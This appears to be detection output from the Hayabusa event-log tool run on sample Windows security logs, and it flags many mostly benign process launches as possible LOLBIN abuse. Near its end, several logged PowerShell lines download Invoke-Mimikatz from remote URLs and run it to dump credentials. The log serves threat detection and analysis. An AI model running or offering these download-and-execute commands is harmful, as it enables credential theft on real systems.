/Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf2c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 05:06:19.672 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe 
/Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdf0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 05:06:38.077 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xac0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-21 05:06:38.083 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x578 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 06:00:11.250 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd68 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 06:00:12.103 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 
06:00:12.141 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x7b8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 06:00:33.844 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc58 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 06:03:11.036 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0x908 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 06:03:11.056 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xfe4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 06:10:05.018 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xc44 | User: IE10WIN7$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 06:10:05.024 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x8ec | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 06:42:10.029 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xac0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 06:42:10.656 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x8e0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 06:42:10.669 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xf50 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 06:42:29.724 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: 
C:\Windows\System32\dllhost.exe | PID: 0x994 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 06:45:11.847 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0xbb0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 06:45:13.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:45:28.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-22 06:45:28.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-08-22 06:45:29.859 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 06:45:30.140 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1c0 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 06:45:43.671 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x998 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 06:45:43.828 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 06:45:45.886 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xbe0 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 06:45:46.517 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xc00 | User: IEUser | LID: 0x4cfe1,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 06:45:47.330 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc20 | 
User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 06:58:44.730 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x238 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 07:00:01.654 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf30 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 07:00:01.685 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf54 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 07:24:56.194 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x210 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 07:31:56.163 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0x6e8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 07:31:56.506 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\hqhlzlxj.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x710 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 07:31:56.600 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\ffyanabt.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0xf70 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 07:31:56.756 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\b_6b5oib.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x6dc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 07:31:56.834 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"" /noconfig 
/fullpaths @""C:\Users\IEUser\AppData\Local\Temp\kyk3rvnx.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | PID: 0x980 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 07:31:57.381 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" ""Local CMOS Clock"" /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0xe5c | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 07:31:57.397 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\PING.EXE"" time.windows.com /n 2 | Path: C:\Windows\System32\PING.EXE | PID: 0x7dc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-22 07:37:26.756 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding | Path: C:\Windows\System32\rundll32.exe | PID: 0xdac | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-23 09:13:00.062 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x754 | User: IE10WIN7$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-23 09:13:02.593 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x920 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-23 09:15:59.673 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xdfc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-23 09:23:16.845 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\makecab.exe"" C:\Windows\Logs\CBS\CbsPersist_20160823002316.log C:\Windows\Logs\CBS\CbsPersist_20160823002316.cab | Path: C:\Windows\System32\makecab.exe | PID: 0xf7c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-23 09:28:51.548 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x3d0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-23 09:28:51.611 
+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xb50 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-23 09:28:51.626 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xad4 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-23 09:30:51.548 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xc44 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:17:10.062 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x478 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:17:10.109 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x6f4 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:20:07.546 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xe90 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:21:09.562 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x708 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:21:09.578 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{6D9A7A40-DDCA-414E-B48E-DFB032C03C1B} | Path: C:\Windows\System32\dllhost.exe | PID: 0xec8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:25:05.171 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds -ComputerName @('computer1', 'computer2')"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd10 | User: IEUser | LID: 
0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:25:05.171 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:25:59.734 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4a8 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:25:59.734 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:26:37.046 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9ec | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:26:37.046 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:27:31.828 +09:00,IE10Win7,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7a4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:27:31.828 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:28:35.375 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xb3c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-25 06:29:40.093 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" 